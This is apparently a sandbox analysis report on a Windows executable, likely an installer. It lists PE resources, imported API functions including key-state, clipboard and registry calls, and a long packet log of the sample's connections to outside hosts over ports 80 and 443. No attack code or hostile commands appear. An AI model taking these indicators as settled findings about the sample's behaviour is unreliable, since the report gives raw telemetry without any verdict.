RT_DIALOG	0xfd9c4	0x100	data	English	United States	0.5234375
RT_DIALOG	0xfdac4	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0xfdbe0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xfdc40	0x5a	data	English	United States	0.7777777777777778
RT_MANIFEST	0xfdc9c	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2024 18:43:08.482213974 CET	49675	443	192.168.2.4	173.222.162.32
Nov 13, 2024 18:43:27.124593019 CET	49723	80	192.168.2.4	199.232.210.172
Nov 13, 2024 18:43:27.130388021 CET	80	49723	199.232.210.172	192.168.2.4
Nov 13, 2024 18:43:27.130458117 CET	49723	80	192.168.2.4	199.232.210.172
Nov 13, 2024 18:44:02.641905069 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:02.641933918 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:02.642004967 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:02.642373085 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:02.642383099 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.383914948 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.384064913 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.388252020 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.388268948 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.388577938 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.395854950 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.439330101 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.619797945 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.619833946 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.619853973 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.620114088 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.620114088 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.620150089 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.620207071 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.643182993 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.643212080 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.643254995 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.643265009 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.643294096 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.643332958 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.737019062 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.737046003 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.737209082 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.737209082 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.737242937 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.737422943 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.761001110 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.761034012 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.761212111 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.761212111 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.761246920 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.761301994 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.762881041 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.762919903 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.762974024 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.762990952 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.763005972 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.763039112 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.765300989 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.765320063 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.765371084 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.765379906 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.765414000 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.765429974 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.854237080 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.854259968 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.854319096 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.854341984 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.854382992 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.877151966 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.877212048 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.877382994 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.877415895 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.877470016 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.877573967 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.877614975 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.877834082 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.877844095 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.877888918 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.878118992 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.878138065 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.878176928 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.878185034 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.878200054 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.878222942 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.879066944 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.879090071 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.879129887 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.879138947 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.879153967 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.879179001 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.882945061 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.882967949 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.883028030 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.883035898 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.883199930 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.883409977 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.883434057 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.883480072 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.883496046 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.883517027 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.883542061 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.971133947 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.971301079 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.971426964 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.971426964 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.971481085 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.971481085 CET	49736	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:03.971503019 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:03.971519947 CET	443	49736	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.008497000 CET	49737	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.008594990 CET	443	49737	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.008697987 CET	49737	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.010510921 CET	49739	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.010534048 CET	443	49739	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.010593891 CET	49739	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.010613918 CET	49738	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.010662079 CET	443	49738	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.010821104 CET	49737	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.010855913 CET	443	49737	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.010879040 CET	49738	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.011965036 CET	49740	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.011974096 CET	49739	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.011997938 CET	443	49739	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.012053967 CET	443	49740	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.012137890 CET	49740	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.012191057 CET	49738	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.012236118 CET	443	49738	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.012236118 CET	49740	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.012269974 CET	443	49740	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.013333082 CET	49741	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.013422966 CET	443	49741	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.013497114 CET	49741	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.015263081 CET	49741	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.015371084 CET	443	49741	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.749371052 CET	443	49741	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.749794006 CET	49741	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.749875069 CET	443	49741	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.750314951 CET	49741	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.750329018 CET	443	49741	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.760267973 CET	443	49737	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.760612011 CET	49737	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.760668039 CET	443	49737	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.761023998 CET	49737	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.761038065 CET	443	49737	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.779577971 CET	443	49740	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.780033112 CET	49740	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.780097961 CET	443	49740	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.780510902 CET	49740	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.780567884 CET	443	49740	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.797291994 CET	443	49738	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.797615051 CET	49738	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.797638893 CET	443	49738	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.797976971 CET	49738	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.797983885 CET	443	49738	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.878767014 CET	443	49741	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.878911972 CET	443	49741	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.878989935 CET	49741	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.879076004 CET	49741	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.879076004 CET	49741	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.879120111 CET	443	49741	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.879149914 CET	443	49741	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.881910086 CET	49743	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.881999016 CET	443	49743	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.882113934 CET	49743	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.882252932 CET	49743	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.882277966 CET	443	49743	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.893564939 CET	443	49737	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.893624067 CET	443	49737	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.893695116 CET	49737	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.893759012 CET	443	49737	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.893793106 CET	443	49737	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.893821001 CET	49737	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.893846989 CET	49737	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.893883944 CET	49737	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.893915892 CET	443	49737	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.893939972 CET	49737	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.893954039 CET	443	49737	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.895955086 CET	49744	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.896001101 CET	443	49744	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.896079063 CET	49744	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.896205902 CET	49744	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.896234035 CET	443	49744	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.918426991 CET	443	49740	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.918531895 CET	443	49740	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.918648005 CET	443	49740	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.918900013 CET	49740	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.918973923 CET	49740	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.919226885 CET	49740	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.919226885 CET	49740	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.919295073 CET	443	49740	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.919332027 CET	443	49740	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.920907021 CET	49745	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.920949936 CET	443	49745	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.921143055 CET	49745	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.921143055 CET	49745	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:04.921212912 CET	443	49745	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.997968912 CET	443	49738	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.998135090 CET	443	49738	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:04.998189926 CET	49738	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.016006947 CET	49738	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.016006947 CET	49738	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.016040087 CET	443	49738	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.016057014 CET	443	49738	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.031464100 CET	49746	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.031555891 CET	443	49746	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.031625032 CET	49746	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.032500982 CET	49746	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.032536983 CET	443	49746	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.641077042 CET	443	49744	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.641453981 CET	49744	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.641499043 CET	443	49744	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.641875029 CET	49744	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.641889095 CET	443	49744	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.773391008 CET	443	49744	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.773546934 CET	443	49744	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.773608923 CET	49744	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.773695946 CET	49744	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.773695946 CET	49744	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.773727894 CET	443	49744	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.773750067 CET	443	49744	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.776618004 CET	49747	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.776653051 CET	443	49747	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.776710033 CET	49747	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.776860952 CET	49747	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.776874065 CET	443	49747	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.781470060 CET	443	49739	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.781819105 CET	49739	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.781836033 CET	443	49739	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.782241106 CET	49739	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.782249928 CET	443	49739	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.910207987 CET	443	49739	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.910259962 CET	443	49739	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.910321951 CET	49739	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.910340071 CET	443	49739	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.910386086 CET	49739	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.910393000 CET	443	49739	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.910448074 CET	49739	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.910650015 CET	49739	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.910650969 CET	49739	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.910670996 CET	443	49739	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.910692930 CET	443	49739	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.913100004 CET	49748	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.913187981 CET	443	49748	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:05.913297892 CET	49748	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.913414001 CET	49748	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:05.913446903 CET	443	49748	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.196297884 CET	443	49743	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.196865082 CET	49743	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.196928024 CET	443	49743	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.197246075 CET	49743	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.197261095 CET	443	49743	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.329623938 CET	443	49743	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.329787016 CET	443	49743	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.329977989 CET	49743	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.329977989 CET	49743	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.329977989 CET	49743	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.332381010 CET	49749	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.332473040 CET	443	49749	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.332591057 CET	49749	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.332701921 CET	49749	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.332725048 CET	443	49749	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.502896070 CET	443	49747	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.503269911 CET	49747	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.503302097 CET	443	49747	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.503679037 CET	49747	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.503688097 CET	443	49747	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.533265114 CET	443	49746	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.533710957 CET	49746	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.533803940 CET	443	49746	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.534037113 CET	49746	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.534049988 CET	443	49746	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.625817060 CET	443	49745	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.626411915 CET	49745	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.626444101 CET	443	49745	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.626847982 CET	49745	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.626856089 CET	443	49745	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.638087988 CET	49743	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.638155937 CET	443	49743	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.640228987 CET	443	49747	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.640635967 CET	443	49747	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.641200066 CET	49747	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.641242027 CET	49747	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.641258001 CET	443	49747	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.641273022 CET	49747	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.641279936 CET	443	49747	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.643651009 CET	49750	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.643738985 CET	443	49750	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.644013882 CET	49750	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.644129992 CET	49750	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.644161940 CET	443	49750	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.687767029 CET	443	49746	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.688122988 CET	443	49746	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.688210964 CET	49746	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.688210964 CET	49746	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.688294888 CET	49746	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.688333988 CET	443	49746	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.690329075 CET	49751	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.690359116 CET	443	49751	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.690541029 CET	49751	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.690702915 CET	49751	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.690720081 CET	443	49751	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.764710903 CET	443	49745	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.765185118 CET	443	49745	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.765255928 CET	49745	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.765336990 CET	49745	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.765358925 CET	443	49745	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.765373945 CET	49745	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.765381098 CET	443	49745	13.107.246.45	192.168.2.4
